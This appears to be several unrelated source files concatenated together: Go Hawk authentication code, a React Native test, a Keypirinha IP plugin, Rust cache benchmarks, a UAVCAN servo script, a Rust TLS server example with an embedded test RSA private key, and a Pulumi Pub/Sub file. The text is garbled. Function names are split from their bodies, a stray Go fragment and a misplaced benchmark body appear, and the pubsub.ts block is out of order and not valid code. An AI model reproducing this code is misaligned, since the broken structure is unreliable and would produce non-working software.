func (auth *Auth) ParseHeader(header string, t AuthType) error { if len(header) < 4 || strings.ToLower(header[:4]) != "hawk" { return AuthFormatError{"scheme", "must be Hawk"} } fields, err := lexHeader(header[4:]) if err != nil { return err } if hash, ok := fields["hash"]; ok { auth.Hash, err = base64.StdEncoding.DecodeString(hash) if err != nil { return AuthFormatError{"hash", "malformed base64 encoding"} } } auth.Ext = fields["ext"] mac := fields["mac"] if mac == "" { return AuthFormatError{"mac", "missing or empty"} } auth.MAC, err = base64.StdEncoding.DecodeString(mac) if err != nil { return AuthFormatError{"mac", "malformed base64 encoding"} } if t == AuthHeader { auth.Credentials.App = fields["app"] auth.Credentials.Delegate = fields["dlg"] auth.Credentials.ID = fields["id"] if ts, ok := fields["ts"]; ok { tsint, err := strconv.ParseInt(ts, 10, 64) if err != nil { return AuthFormatError{"ts", "not an integer"} } auth.Timestamp = time.Unix(tsint, 0) } auth.Nonce = fields["nonce"] } return nil } // Valid confirms that the timestamp is within skew and verifies the MAC. // // If the request is valid, nil will be returned. If auth is a bewit and the // method is not GET or HEAD, ErrInvalidBewitMethod will be returned. If auth is // a bewit and the timestamp is after the the specified expiry, ErrBewitExpired // will be returned. If auth is from a request header and the timestamp is // outside the maximum skew, ErrTimestampSkew will be returned. If the MAC is // not the expected value, ErrInvalidMAC will be returned. func (auth *Auth) Valid() error { t := AuthHeader if auth.IsBewit { t = AuthBewit if auth.Method != "GET" && auth.Method != "HEAD" { return ErrInvalidBewitMethod } if auth.ActualTimestamp.After(auth.Timestamp) { return ErrBewitExpired } } else { skew := auth.ActualTimestamp.Sub(auth.Timestamp) if abs(skew) > MaxTimestampSkew { return ErrTimestampSkew } } if !hmac.Equal(auth.mac(t), auth.MAC) { if auth.IsBewit && strings.HasPrefix(auth.RequestURI, "http") && len(auth.RequestURI) > 9 { // try just the path uri := auth.RequestURI auth.RequestURI = "/" + strings.SplitN(auth.RequestURI[8:], "/", 2)[1] if auth.Valid() == nil { return nil } auth.RequestURI = uri } return ErrInvalidMAC } return nil } func abs(d time.Duration) time.Duration { if d < 0 { return -d } return d } // ValidResponse checks that a response Server-Authorization header is correct. // // ErrMissingServerAuth is returned if header is an empty string. ErrInvalidMAC // is returned if the MAC is not the expected value. func (auth *Auth) ValidResponse(header string) error { if header == "" { return ErrMissingServerAuth } err := auth.ParseHeader(header, AuthResponse) if err != nil { return err } if !hmac.Equal(auth.mac(AuthResponse), auth.MAC) { return ErrInvalidMAC } return nil } // PayloadHash initializes a hash for body validation. To validate a request or // response body, call PayloadHash with contentType set to the body Content-Type // with all parameters and prefix/suffix whitespace stripped, write the entire // body to the returned hash, and then validate the hash with ValidHash. func (auth *Auth) PayloadHash(contentType string) hash.Hash { h := auth.Credentials.Hash() h.Write([]byte("hawk." + headerVersion + ".payload\n" + contentType + "\n")) return h } // ValidHash writes the final newline to h and checks if it matches auth.Hash. 
func (auth *Auth) ValidHash(h hash.Hash) bool { h.Write([]byte("\n")) return hmac.Equal(h.Sum(nil), auth.Hash) } // SetHash writes the final newline to h and sets auth.Hash to the sum. This is // used to specify a response payload hash. func (auth *Auth) SetHash(h hash.Hash) { h.Write([]byte("\n")) auth.Hash = h.Sum(nil) auth.ReqHash = false } // ResponseHeader builds a response header based on the auth and provided ext, // which may be an empty string. Use PayloadHash and SetHash before // ResponseHeader to include a hash of the response payload. func (auth *Auth) ResponseHeader(ext string) string { auth.Ext = ext if auth.ReqHash { auth.Hash = nil } h := `Hawk mac="` + base64.StdEncoding.EncodeToString(auth.mac(AuthResponse)) + `"` if auth.Ext != "" { h += `, ext="` + auth.Ext + `"` } if auth.Hash != nil { h += `, hash="` + base64.StdEncoding.EncodeToString(auth.Hash) + `"` } return h } // RequestHeader builds a request header based on the auth. func (auth *Auth) RequestHeader() string { auth.MAC = auth.mac(AuthHeader) h := `Hawk id="` + auth.Credentials.ID + `", mac="` + base64.StdEncoding.EncodeToString(auth.MAC) + `", ts="` + strconv.FormatInt(auth.Timestamp.Unix(), 10) + `", nonce="` + auth.Nonce + `"` if len(auth.Hash) > 0 { h += `, hash="` + base64.StdEncoding.EncodeToString(auth.Hash) + `"` } if auth.Ext != "" { h += `, ext="` + auth.Ext + `"` } if auth.Credentials.App != "" { h += `, app="` + auth.Credentials.App + `"` } if auth.Credentials.Delegate != "" { h += `, dlg="` + auth.Credentials.Delegate + `"` } return h } // Bewit creates and encoded request bewit parameter based on the auth. func (auth *Auth) Bewit() string { auth.Method = "GET" auth.Nonce = "" return strings.TrimRight(base64.URLEncoding.EncodeToString([]byte(auth.Credentials.ID+`\`+ strconv.FormatInt(auth.Timestamp.Unix(), 10)+`\`+ base64.StdEncoding.EncodeToString(auth.mac(AuthBewit))+`\`+ auth.Ext)), "=") } // NormalizedString builds the string that will be HMACed to create a request // MAC. func (auth *Auth) NormalizedString(t AuthType) string { str := "hawk." + headerVersion + "." + t.String() + "\n" + strconv.FormatInt(auth.Timestamp.Unix(), 10) + "\n" + auth.Nonce + "\n" + auth.Method + "\n" + auth.RequestURI + "\n" + auth.Host + "\n" + auth.Port + "\n" + base64.StdEncoding.EncodeToString(auth.Hash) + "\n" + auth.Ext + "\n" if auth.Credentials.App != "" { str += auth.Credentials.App + "\n" str += auth.Credentials.Delegate + "\n" } return str } func (auth *Auth) mac(t AuthType) []byte { mac := auth.Credentials.MAC() mac.Write([]byte(auth.NormalizedString(t))) return mac.Sum(nil) } func (auth *Auth) tsMac(ts string) []byte { mac := auth.Credentials.MAC() mac.Write([]byte("hawk." + headerVersion + ".ts\n" + ts + "\n")) return mac.Sum(nil) } // StaleTimestampHeader builds a signed WWW-Authenticate response header for use // when Valid returns ErrTimestampSkew. func (auth *Auth) StaleTimestampHeader() string { ts := strconv.FormatInt(Now().Unix(), 10) return `Hawk ts="` + ts + `", tsm="` + base64.StdEncoding.EncodeToString(auth.tsMac(ts)) + `", error="Stale timestamp"` } var tsHeaderRegex = regexp.MustCompile(`(ts|tsm|error)="([ !#-\[\]-~]+)"`) // character class is ASCII printable [\x20-\x7E] without \ and " // UpdateOffset parses a signed WWW-Authenticate response header containing // a stale timestamp error and updates auth.Timestamp with an adjusted // timestamp. 
func (auth *Auth) UpdateOffset(header string) (time.Duration, error) {
    if len(header) < 4 || strings.ToLower(header[:4]) != "hawk" {
        return 0, AuthFormatError{"scheme", "must be Hawk"}
    }

    matches := tsHeaderRegex.FindAllStringSubmatch(header, 3)

    var err error
    var ts time.Time
    var tsm []byte

    for _, match := range matches {
        switch match[1] {
        case "ts":
            t, err := strconv.ParseInt(match[2], 10, 64)
            if err != nil {
                return 0, AuthFormatError{"ts", "not an integer"}
            }
            ts = time.Unix(t, 0)
        case "tsm":
            tsm, err = base64.StdEncoding.DecodeString(match[2])
            if err != nil {
                return 0, AuthFormatError{"tsm", "malformed base64 encoding"}
            }
        }
    }

    if !hmac.Equal(tsm, auth.tsMac(strconv.FormatInt(ts.Unix(), 10))) {
        return 0, ErrInvalidMAC
    }

    offset := ts.Sub(Now())
    auth.Timestamp = ts
    auth.Nonce = nonce()
    return offset, nil
}
port = "80" }
index.test.tsx
import React from 'react'
import { render, fireEvent } from '@testing-library/react-native'
import Controls from '.'
import { ILsChatMessage, ILsChatUser } from '../../../interfaces'
import { delay } from '../../../utils'
import { GestureResponderEvent } from 'react-native'

let mockUser: ILsChatUser
let mockUser2: ILsChatUser
let mockMessage: ILsChatMessage
let onPressControlBody: (event: GestureResponderEvent) => void
let onDeleteControlButtonPress: (event: GestureResponderEvent) => void
let onReplyControlButtonPress: (event: GestureResponderEvent) => void

const ControlsA11yLabel = 'Selected Message Action Controls'
const ReplyControlsA11yLabel = 'Reply Message Control Button'
const DeleteControlsA11yLabel = 'Delete Message Control Button'

describe('Controls tests', () => {
    beforeEach(() => {
        onPressControlBody = jest.fn()
        onDeleteControlButtonPress = jest.fn()
        onReplyControlButtonPress = jest.fn()
        mockUser = {
            id: '1',
            name: 'Test User',
            photo: 'https://avatars3.githubusercontent.com/u/5066378?s=400&u=98d81da11220a6d0f7f51532e2c3e949b50a445b&v=4',
        }
        mockUser2 = {
            id: '2',
            name: 'Test User 2',
            photo: 'https://avatars3.githubusercontent.com/u/5066378?s=400&u=98d81da11220a6d0f7f51532e2c3e949b50a445b&v=4',
        }
        mockMessage = {
            id: '1',
            text: 'Test Message',
            user: mockUser,
            time: new Date().getTime(),
            isDelivered: true,
            isRead: true,
        }
    })

    it('Should Controls component render properly', () => {
        const { queryByA11yLabel } = render(
            <Controls
                user={mockUser}
                message={mockMessage}
                onPressControlBody={onPressControlBody}
                onDeleteControlButtonPress={onDeleteControlButtonPress}
                onReplyControlButtonPress={onReplyControlButtonPress}
            />
        )

        const controls = queryByA11yLabel(ControlsA11yLabel)

        expect(controls).not.toBeNull()
    })

    it('Should Controls component NOT render if prop "message" is null', () => {
        const { queryByA11yLabel } = render(
            <Controls
                user={mockUser}
                message={null}
                onPressControlBody={onPressControlBody}
                onDeleteControlButtonPress={onDeleteControlButtonPress}
                onReplyControlButtonPress={onReplyControlButtonPress}
            />
        )

        const controls = queryByA11yLabel(ControlsA11yLabel)

        expect(controls).toBeNull()
    })

    it('Should Delete button NOT render if message user is NOT the same as the logged user', () => {
        const { queryByA11yLabel } = render(
            <Controls
                user={mockUser2}
                message={mockMessage}
                onPressControlBody={onPressControlBody}
                onDeleteControlButtonPress={onDeleteControlButtonPress}
                onReplyControlButtonPress={onReplyControlButtonPress}
            />
        )

        const deleteButton = queryByA11yLabel(DeleteControlsA11yLabel)

        expect(deleteButton).toBeNull()
    })

    it('Should Delete button render if message user is the same as the logged user', () => {
        const { queryByA11yLabel } = render(
            <Controls
                user={mockUser}
                message={mockMessage}
                onPressControlBody={onPressControlBody}
                onDeleteControlButtonPress={onDeleteControlButtonPress}
                onReplyControlButtonPress={onReplyControlButtonPress}
            />
        )

        const deleteButton = queryByA11yLabel(DeleteControlsA11yLabel)

        expect(deleteButton).not.toBeNull()
    })

    it('Should Reply button NOT render if message prop "isDelivered" === false', () => {
        // Changing the status of the message to WAITING
        mockMessage.isDelivered = false
        mockMessage.isRead = false

        const { queryByA11yLabel } = render(
            <Controls
                user={mockUser}
                message={mockMessage}
                onPressControlBody={onPressControlBody}
                onDeleteControlButtonPress={onDeleteControlButtonPress}
                onReplyControlButtonPress={onReplyControlButtonPress}
            />
        )

        const replyButton = queryByA11yLabel(ReplyControlsA11yLabel)

        expect(replyButton).toBeNull()
    })

    it('Should Reply button render if message prop "isDelivered" === true', () => {
        // Changing the status of the message to DELIVERED
        mockMessage.isDelivered = true
        mockMessage.isRead = false

        const { queryByA11yLabel } = render(
            <Controls
                user={mockUser}
                message={mockMessage}
                onPressControlBody={onPressControlBody}
                onDeleteControlButtonPress={onDeleteControlButtonPress}
                onReplyControlButtonPress={onReplyControlButtonPress}
            />
        )

        const replyButton = queryByA11yLabel(ReplyControlsA11yLabel)

        expect(replyButton).not.toBeNull()
    })

    it('Should Reply button render if message prop "isRead" === true', () => {
        // Changing the status of the message to READ
        mockMessage.isDelivered = false
        mockMessage.isRead = true

        const { queryByA11yLabel } = render(
            <Controls
                user={mockUser}
                message={mockMessage}
                onPressControlBody={onPressControlBody}
                onDeleteControlButtonPress={onDeleteControlButtonPress}
                onReplyControlButtonPress={onReplyControlButtonPress}
            />
        )

        const replyButton = queryByA11yLabel(ReplyControlsA11yLabel)

        expect(replyButton).not.toBeNull()
    })

    it('Should onPressControlBody be triggered properly if body overlay is pressed', async () => {
        const { queryByA11yLabel } = render(
            <Controls
                user={mockUser}
                message={mockMessage}
                onPressControlBody={onPressControlBody}
                onDeleteControlButtonPress={onDeleteControlButtonPress}
                onReplyControlButtonPress={onReplyControlButtonPress}
            />
        )

        const overlayButton = queryByA11yLabel(ControlsA11yLabel)

        fireEvent(overlayButton, 'onPress')

        await delay(500)

        expect(onPressControlBody).toBeCalledTimes(1)
    })
    it('Should onDeleteControlButtonPress be triggered properly if delete button is pressed', () => {
        const { queryByA11yLabel } = render(
            <Controls
                user={mockUser}
                message={mockMessage}
                onPressControlBody={onPressControlBody}
                onDeleteControlButtonPress={onDeleteControlButtonPress}
                onReplyControlButtonPress={onReplyControlButtonPress}
            />
        )

        const deleteButton = queryByA11yLabel(DeleteControlsA11yLabel)

        fireEvent(deleteButton, 'onPress')

        expect(onDeleteControlButtonPress).toBeCalledTimes(1)
    })

    it('Should onReplyControlButtonPress be triggered properly if reply button is pressed', () => {
        const { queryByA11yLabel } = render(
            <Controls
                user={mockUser}
                message={mockMessage}
                onPressControlBody={onPressControlBody}
                onDeleteControlButtonPress={onDeleteControlButtonPress}
                onReplyControlButtonPress={onReplyControlButtonPress}
            />
        )

        const replyButton = queryByA11yLabel(ReplyControlsA11yLabel)

        fireEvent(replyButton, 'onPress')

        expect(onReplyControlButtonPress).toBeCalledTimes(1)
    })
})
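The overlay-press test above sleeps for a fixed 500 ms before asserting on the mock. A sketch of the same check using waitFor is below; it assumes the installed @testing-library/react-native version exports waitFor (recent versions do) and reuses the mocks and labels already defined in this file, so it is a drop-in variant of that test rather than a new one.

    // Sketch: poll for the handler call instead of a hard-coded delay.
    // Assumes `waitFor` is added to the existing @testing-library/react-native import.
    it('Should onPressControlBody be triggered properly if body overlay is pressed (waitFor variant)', async () => {
        const { queryByA11yLabel } = render(
            <Controls
                user={mockUser}
                message={mockMessage}
                onPressControlBody={onPressControlBody}
                onDeleteControlButtonPress={onDeleteControlButtonPress}
                onReplyControlButtonPress={onReplyControlButtonPress}
            />
        )

        fireEvent(queryByA11yLabel(ControlsA11yLabel), 'onPress')

        // Resolves as soon as the expectation passes, or fails on timeout.
        await waitFor(() => expect(onPressControlBody).toBeCalledTimes(1))
    })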
myip.py
# Keypirinha launcher (keypirinha.com) import socket import keypirinha as kp import keypirinha_net as kpnet import keypirinha_util as kpu class
(kp.Plugin): """ Get your public and local IP directly from Keypirinha. """ ITEM_CAT = kp.ItemCategory.USER_BASE + 1 KEYWORD = 'ip' def __init__(self): super().__init__() self._urlopener = kpnet.build_urllib_opener() def on_suggest(self, user_input, items_chain): if user_input.lower() == self.KEYWORD: public_ip = self._get_public_ip() local_ip = self._get_local_ip() self.set_catalog( [ self.create_item( category=kp.ItemCategory.KEYWORD, label='Your public IP', short_desc=public_ip, target='public_ip', args_hint=kp.ItemArgsHint.FORBIDDEN, hit_hint=kp.ItemHitHint.NOARGS ), self.create_item( category=kp.ItemCategory.KEYWORD, label='Your local IP', short_desc=local_ip, target='local_ip', args_hint=kp.ItemArgsHint.FORBIDDEN, hit_hint=kp.ItemHitHint.NOARGS ) ] ) def on_execute(self, item, action): kpu.set_clipboard(item.short_desc()) def on_events(self, flags): if flags & kp.Events.NETOPTIONS: self._urlopener = kpnet.build_urllib_opener() def _get_public_ip(self): try: with self._urlopener.open('http://icanhazip.com') as res: return res.read().decode('utf-8') except Exception as ex: self.err(ex) return 'Could not establish your public ip' def _get_local_ip(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) return s.getsockname()[0] except Exception as ex: self.err(ex) return 'Could not establish your local ip'
MyIP
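The plugin's two lookups are small enough to exercise outside Keypirinha. The standalone sketch below uses the same techniques (a UDP connect to a public resolver for the local address, an HTTP call to icanhazip.com for the public one), swapping the kpnet opener for urllib and adding socket cleanup and whitespace stripping for tidiness.

#!/usr/bin/env python3
"""Standalone sketch of the IP lookups used by the MyIP plugin above."""
import socket
import urllib.request


def get_local_ip() -> str:
    # Connecting a UDP socket sends no packets; it only selects the outbound
    # interface, whose address getsockname() then reports.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        return s.getsockname()[0]
    finally:
        s.close()


def get_public_ip() -> str:
    # icanhazip.com answers with the caller's public address plus a newline.
    with urllib.request.urlopen("http://icanhazip.com") as res:
        return res.read().decode("utf-8").strip()


if __name__ == "__main__":
    print("local:", get_local_ip())
    print("public:", get_public_ip())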
benchmarks.rs
// This Source Code Form is subject to the terms of the Mozilla Public // License, v. 2.0. If a copy of the MPL was not distributed with this file, // You can obtain one at http://mozilla.org/MPL/2.0/. use async_std::task; use cacache; use criterion::{black_box, criterion_group, criterion_main, Criterion}; use tempfile; fn read_hash(c: &mut Criterion) { let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = b"hello world".to_vec(); let sri = cacache::put::data(&cache, "hello", data).unwrap(); c.bench_function("read_hash", move |b| { b.iter(|| cacache::get::read_hash(black_box(&cache), black_box(&sri)).unwrap()) }); } fn read(c: &mut Criterion) { let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = b"hello world".to_vec(); cacache::put::data(&cache, "hello", data).unwrap(); cacache::get::read(&cache, "hello").unwrap(); c.bench_function("read", move |b| { b.iter(|| cacache::get::read(black_box(&cache), black_box(String::from("hello"))).unwrap()) }); } fn read_hash_big_data(c: &mut Criterion) { let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = vec![1; 1024 * 1024 * 5]; let sri = cacache::put::data(&cache, "hello", data).unwrap(); c.bench_function("read_hash_big_data", move |b| { b.iter(|| cacache::get::read_hash(black_box(&cache), black_box(&sri)).unwrap()) }); } fn async_read_hash(c: &mut Criterion) { let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = b"hello world".to_vec(); let sri = cacache::put::data(&cache, "hello", data).unwrap(); c.bench_function("async_read_hash", move |b| { b.iter(|| { task::block_on(cacache::async_get::read_hash( black_box(&cache), black_box(&sri), )) .unwrap() }) }); } fn async_read(c: &mut Criterion) { let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = b"hello world".to_vec(); cacache::put::data(&cache, "hello", data).unwrap(); c.bench_function("async_read", move |b| { b.iter(|| { task::block_on(cacache::async_get::read( black_box(&cache), black_box("hello"), )) .unwrap() }) }); } fn async_read_hash_big_data(c: &mut Criterion)
criterion_group!( benches, read_hash, read, async_read_hash, async_read, read_hash_big_data, async_read_hash_big_data, ); criterion_main!(benches);
{ let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = vec![1; 1024 * 1024 * 5]; let sri = cacache::put::data(&cache, "hello", data).unwrap(); c.bench_function("async_read_hash_big_data", move |b| { b.iter(|| { task::block_on(cacache::async_get::read_hash( black_box(&cache), black_box(&sri), )) .unwrap() }) }); }
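The suite above only benchmarks reads. A write benchmark following the same structure would look roughly like the sketch below; it reuses cacache::put::data, the same call the read benchmarks already make during setup, so no new APIs are assumed. Registering it would just mean adding write to the criterion_group! list.

// Sketch of a matching write benchmark for this suite.
fn write(c: &mut Criterion) {
    let tmp = tempfile::tempdir().unwrap();
    let cache = tmp.path().to_owned();
    let data = b"hello world".to_vec();
    c.bench_function("write", move |b| {
        b.iter(|| {
            // Clone per iteration because put::data takes the buffer by value.
            cacache::put::data(black_box(&cache), black_box("hello"), black_box(data.clone()))
                .unwrap()
        })
    });
}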
set_servo.py
#!/usr/bin/env python3 """ Sends a PWM via UAVCAN """ import argparse import uavcan import os DSDL_DIR = os.path.join(os.path.dirname(__file__), "../uavcan_data_types/cvra") def parse_args(): parser = argparse.ArgumentParser(description=__doc__) parser.add_argument( "port", help="SocketCAN interface (e.g. can0) or SLCAN serial port (e.g. /dev/ttyACM0)", ) parser.add_argument("id", help="ID of the board to target", type=int) parser.add_argument("servo", help="Servo output to be controlled", type=int) parser.add_argument( "pos", help="Desired duty cycle on the servo output", type=float ) parser.add_argument( "vel", help="Desired duty cycle rate of change", nargs="?", default=0, type=float, ) parser.add_argument( "acc", help="Desired duty cycle rate of rate of change", nargs="?", default=0, type=float, ) return parser.parse_args() def set_servo(node, dst_id, values): msg = uavcan.thirdparty.cvra.io.ServoPWM( node_id=dst_id, servo_pos=values["pos"], servo_vel=values["vel"], servo_acc=values["acc"], ) node.broadcast(msg, priority=uavcan.TRANSFER_PRIORITY_HIGHEST) def
(servo, pos, vel, acc): setpoint = { "pos": [0, 0, 0, 0], "vel": [0, 0, 0, 0], "acc": [0, 0, 0, 0], } setpoint["pos"][servo] = pos setpoint["vel"][servo] = vel setpoint["acc"][servo] = acc return setpoint def main(): args = parse_args() node = uavcan.make_node(args.port, node_id=42) uavcan.load_dsdl(DSDL_DIR) set_servo(node, args.id, servo_setpoint(args.servo, args.pos, args.vel, args.acc)) # Spin node for 1 second node.spin(1) node.close() if __name__ == "__main__": main()
servo_setpoint
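As a quick illustration of what the servo_setpoint helper above builds: only the selected output carries the requested values, the other three channels stay at zero. The snippet relies on servo_setpoint as defined in this file.

# Example: setpoint for servo output 2 at 50 % duty cycle.
setpoint = servo_setpoint(2, 0.5, 0.0, 0.0)
assert setpoint == {
    "pos": [0, 0, 0.5, 0],
    "vel": [0, 0, 0.0, 0],
    "acc": [0, 0, 0.0, 0],
}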
main.rs
use poem::{ get, handler, listener::{Listener, RustlsConfig, TcpListener}, Route, Server, }; const CERT: &str = r#" -----BEGIN CERTIFICATE----- MIIEADCCAmigAwIBAgICAcgwDQYJKoZIhvcNAQELBQAwLDEqMCgGA1UEAwwhcG9u eXRvd24gUlNBIGxldmVsIDIgaW50ZXJtZWRpYXRlMB4XDTE2MDgxMzE2MDcwNFoX DTIyMDIwMzE2MDcwNFowGTEXMBUGA1UEAwwOdGVzdHNlcnZlci5jb20wggEiMA0G CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCpVhh1/FNP2qvWenbZSghari/UThwe dynfnHG7gc3JmygkEdErWBO/CHzHgsx7biVE5b8sZYNEDKFojyoPHGWK2bQM/FTy niJCgNCLdn6hUqqxLAml3cxGW77hAWu94THDGB1qFe+eFiAUnDmob8gNZtAzT6Ky b/JGJdrEU0wj+Rd7wUb4kpLInNH/Jc+oz2ii2AjNbGOZXnRz7h7Kv3sO9vABByYe LcCj3qnhejHMqVhbAT1MD6zQ2+YKBjE52MsQKU/xhUpu9KkUyLh0cxkh3zrFiKh4 Vuvtc+n7aeOv2jJmOl1dr0XLlSHBlmoKqH6dCTSbddQLmlK7dms8vE01AgMBAAGj gb4wgbswDAYDVR0TAQH/BAIwADALBgNVHQ8EBAMCBsAwHQYDVR0OBBYEFMeUzGYV bXwJNQVbY1+A8YXYZY8pMEIGA1UdIwQ7MDmAFJvEsUi7+D8vp8xcWvnEdVBGkpoW oR6kHDAaMRgwFgYDVQQDDA9wb255dG93biBSU0EgQ0GCAXswOwYDVR0RBDQwMoIO dGVzdHNlcnZlci5jb22CFXNlY29uZC50ZXN0c2VydmVyLmNvbYIJbG9jYWxob3N0 MA0GCSqGSIb3DQEBCwUAA4IBgQBsk5ivAaRAcNgjc7LEiWXFkMg703AqDDNx7kB1 RDgLalLvrjOfOp2jsDfST7N1tKLBSQ9bMw9X4Jve+j7XXRUthcwuoYTeeo+Cy0/T 1Q78ctoX74E2nB958zwmtRykGrgE/6JAJDwGcgpY9kBPycGxTlCN926uGxHsDwVs 98cL6ZXptMLTR6T2XP36dAJZuOICSqmCSbFR8knc/gjUO36rXTxhwci8iDbmEVaf BHpgBXGU5+SQ+QM++v6bHGf4LNQC5NZ4e4xvGax8ioYu/BRsB/T3Lx+RlItz4zdU XuxCNcm3nhQV2ZHquRdbSdoyIxV5kJXel4wCmOhWIq7A2OBKdu5fQzIAzzLi65EN RPAKsKB4h7hGgvciZQ7dsMrlGw0DLdJ6UrFyiR5Io7dXYT/+JP91lP5xsl6Lhg9O FgALt7GSYRm2cZdgi9pO9rRr83Br1VjQT1vHz6yoZMXSqc4A2zcN2a2ZVq//rHvc FZygs8miAhWPzqnpmgTj1cPiU1M= -----END CERTIFICATE----- "#; const KEY: &str = r#" -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAqVYYdfxTT9qr1np22UoIWq4v1E4cHncp35xxu4HNyZsoJBHR K1gTvwh8x4LMe24lROW/LGWDRAyhaI8qDxxlitm0DPxU8p4iQoDQi3Z+oVKqsSwJ pd3MRlu+4QFrveExwxgdahXvnhYgFJw5qG/IDWbQM0+ism/yRiXaxFNMI/kXe8FG +JKSyJzR/yXPqM9ootgIzWxjmV50c+4eyr97DvbwAQcmHi3Ao96p4XoxzKlYWwE9 TA+s0NvmCgYxOdjLEClP8YVKbvSpFMi4dHMZId86xYioeFbr7XPp+2njr9oyZjpd Xa9Fy5UhwZZqCqh+nQk0m3XUC5pSu3ZrPLxNNQIDAQABAoIBAFKtZJgGsK6md4vq kyiYSufrcBLaaEQ/rkQtYCJKyC0NAlZKFLRy9oEpJbNLm4cQSkYPXn3Qunx5Jj2k 2MYz+SgIDy7f7KHgr52Ew020dzNQ52JFvBgt6NTZaqL1TKOS1fcJSSNIvouTBerK NCSXHzfb4P+MfEVe/w1c4ilE+kH9SzdEo2jK/sRbzHIY8TX0JbmQ4SCLLayr22YG usIxtIYcWt3MMP/G2luRnYzzBCje5MXdpAhlHLi4TB6x4h5PmBKYc57uOVNngKLd YyrQKcszW4Nx5v0a4HG3A5EtUXNCco1+5asXOg2lYphQYVh2R+1wgu5WiDjDVu+6 EYgjFSkCgYEA0NBk6FDoxE/4L/4iJ4zIhu9BptN8Je/uS5c6wRejNC/VqQyw7SHb hRFNrXPvq5Y+2bI/DxtdzZLKAMXOMjDjj0XEgfOIn2aveOo3uE7zf1i+njxwQhPu uSYA9AlBZiKGr2PCYSDPnViHOspVJjxRuAgyWM1Qf+CTC0D95aj0oz8CgYEAz5n4 Cb3/WfUHxMJLljJ7PlVmlQpF5Hk3AOR9+vtqTtdxRjuxW6DH2uAHBDdC3OgppUN4 CFj55kzc2HUuiHtmPtx8mK6G+otT7Lww+nLSFL4PvZ6CYxqcio5MPnoYd+pCxrXY JFo2W7e4FkBOxb5PF5So5plg+d0z/QiA7aFP1osCgYEAtgi1rwC5qkm8prn4tFm6 hkcVCIXc+IWNS0Bu693bXKdGr7RsmIynff1zpf4ntYGpEMaeymClCY0ppDrMYlzU RBYiFNdlBvDRj6s/H+FTzHRk2DT/99rAhY9nzVY0OQFoQIXK8jlURGrkmI/CYy66 XqBmo5t4zcHM7kaeEBOWEKkCgYAYnO6VaRtPNQfYwhhoFFAcUc+5t+AVeHGW/4AY M5qlAlIBu64JaQSI5KqwS0T4H+ZgG6Gti68FKPO+DhaYQ9kZdtam23pRVhd7J8y+ xMI3h1kiaBqZWVxZ6QkNFzizbui/2mtn0/JB6YQ/zxwHwcpqx0tHG8Qtm5ZAV7PB eLCYhQKBgQDALJxU/6hMTdytEU5CLOBSMby45YD/RrfQrl2gl/vA0etPrto4RkVq UrkDO/9W4mZORClN3knxEFSTlYi8YOboxdlynpFfhcs82wFChs+Ydp1eEsVHAqtu T+uzn0sroycBiBfVB949LExnzGDFUkhG0i2c2InarQYLTsIyHCIDEA== -----END RSA PRIVATE KEY----- "#; #[handler] fn index() -> &'static str { "hello world" } #[tokio::main] async fn
() -> Result<(), std::io::Error> { if std::env::var_os("RUST_LOG").is_none() { std::env::set_var("RUST_LOG", "poem=debug"); } tracing_subscriber::fmt::init(); let app = Route::new().at("/", get(index)); let listener = TcpListener::bind("127.0.0.1:3000").rustls(RustlsConfig::new().key(KEY).cert(CERT)); Server::new(listener).run(app).await }
main
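Embedding the PEM blocks as string constants keeps the example self-contained. A variant of main that reads the key pair from disk at startup is sketched below; the file paths are hypothetical, and the RustlsConfig builder calls are the same ones used above, so only the source of the PEM material changes.

// Sketch: same server, PEM material loaded from (hypothetical) files on disk.
#[tokio::main]
async fn main() -> Result<(), std::io::Error> {
    if std::env::var_os("RUST_LOG").is_none() {
        std::env::set_var("RUST_LOG", "poem=debug");
    }
    tracing_subscriber::fmt::init();

    // Placeholder paths; any readable PEM pair works here.
    let key = std::fs::read_to_string("certs/server.key")?;
    let cert = std::fs::read_to_string("certs/server.crt")?;

    let app = Route::new().at("/", get(index));
    let listener =
        TcpListener::bind("127.0.0.1:3000").rustls(RustlsConfig::new().key(key).cert(cert));
    Server::new(listener).run(app).await
}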
pubsub.ts
import * as gcp from "@pulumi/gcp"

const furniDataTopic = new gcp.pubsub.Topic("furni-data-topic")
const furniDataDeadLetterTopic = new gcp.pubsub.Topic("furni-data-dead-letter-topic")

new gcp.pubsub.Subscription("furni-data-dead-letter-subscription", {
    }
})

export { furniDataTopic }
    topic: furniDataTopic.name,
    deadLetterPolicy: {
        deadLetterTopic: furniDataDeadLetterTopic.id,
        maxDeliveryAttempts: 15
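For dead lettering to actually forward messages, GCP also expects the Pub/Sub service agent to hold publish rights on the dead-letter topic (and subscribe rights on the source subscription). A hedged sketch of the publisher half is below; the config key and the service-agent address format (derived from the project number) are assumptions to verify against the GCP documentation, not something taken from this stack.

// Sketch: grant the Pub/Sub service agent publish access on the dead-letter topic.
import * as pulumi from "@pulumi/pulumi"
import * as gcp from "@pulumi/gcp"

// Hypothetical config value; the service agent is addressed by project *number*.
const projectNumber = new pulumi.Config().require("gcpProjectNumber")

new gcp.pubsub.TopicIAMMember("furni-data-dead-letter-publisher", {
    topic: furniDataDeadLetterTopic.name,
    role: "roles/pubsub.publisher",
    member: `serviceAccount:service-${projectNumber}@gcp-sa-pubsub.iam.gserviceaccount.com`,
})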
proc_macro_input.rs
